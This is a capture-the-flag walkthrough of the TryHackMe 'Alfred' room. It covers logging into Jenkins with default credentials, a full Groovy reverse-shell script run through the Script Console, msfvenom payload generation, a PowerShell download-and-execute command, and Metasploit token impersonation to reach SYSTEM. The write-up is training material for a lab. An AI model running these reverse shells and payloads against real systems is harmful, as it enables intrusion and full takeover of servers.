TryHackMe: Alfred Room Writeup
Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens. https://www.tryhackme.com/room/alfred
Task 1: Initial Access
How many ports are open? (TCP only)
We do the usual nmap scan here:
export rhost=1.1.1.1 // target machine ip
nmap -sV --script vuln $rhost | tee nmap-$rhost.out
grep open nmap-$rhost.out
3
What is the username and password for the log in panel(in the format username:password)
In the browser, go to $rhost:8080 and we see a login page. Try the first thing that comes to mind, we’re in!
admin:admin
What is the user.txt flag?
Click around the Jenkins pages. There are more than 1 way to get a reverse shell, I find the easiest is to use the Script Console. (This doesn’t really follow the steps in the task description, which involves creating a new Jenkins build that runs a Windows batch command)
In the left sidebar, navigate to “Manage Jenkins” > “Script Console”, or just go to $rhost:8080/script
As explained in the page, the script console allows us to run “an arbitrary Groovy script”, nice. Let’s first start a netcat listener.
nc -lvnp 4444Now let’s google for a groovy script. We’ll find one here (use Alternative 1 which is “more stealthy”). Change the host and port to your values, then paste it in the Script Console and run. Almost immediately, we’ll see a reverse shell in the listener.
Thread.start {
String host="10.0.0.1";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
}
Task 2: Switching Shells
What is the final size of the exe payload that you generated?
Let’s generate the payload!
export lhost=1.1.1.1 // your local ip
export rport=4445 // local port
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=$lhost LPORT=$lport -f exe -o alfred.exe
73802
Task 3: Privilege Escalation
To check which tokens are available, enter the list_tokens -g. … What is the output when you run the getuid command?
Now we need to get a reverse shell again, this time with Metasploit. (Note: the steps here deviate from the task description).
To get the payload onto the remote machine, we need to start a HTTP server. On our local machine, run this:
python3 -m http.serverThen in another session, start Metasploit and create a listener.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 1.1.1.1 // your machine ip
set LPORT 4447
run -jNow in the remote shell, run this to download the payload that we had created earlier (remember to change the host):
powershell -c "(New-Object System.Net.WebClient).Downloadfile('http://1.1.1.1:8000/alfred.exe','alfred.exe')"Then start it:
powershell -c Start-Process "alfred.exe"We should now have a metepreter session!
Activate it, use the incognito module and impersonate the token:
use incognito
impersonate_token "BUILTIN\Administrators"
NT AUTHORITY\SYSTEM
Read the root.txt file at C:\Windows\System32\config
Now we need to migrate to a root process as described in the task description:
ps services
migrate <uid>
Since the migration is successful, we should be in the C:\Windows\System32 dir. So let’s just check out the flag!
Other TryHackMe articles you may like
…and more in my Writeups and CTF Logs Catalogue.
I also write about software engineering topics:
- Write fluent code in Kotlin
- Software Estimates are a Two-Sided Relationship
- The 3 types of code reviews
Hi, if you enjoyed this post, I thought that you might also enjoy these t-shirts with code-inspired designs.
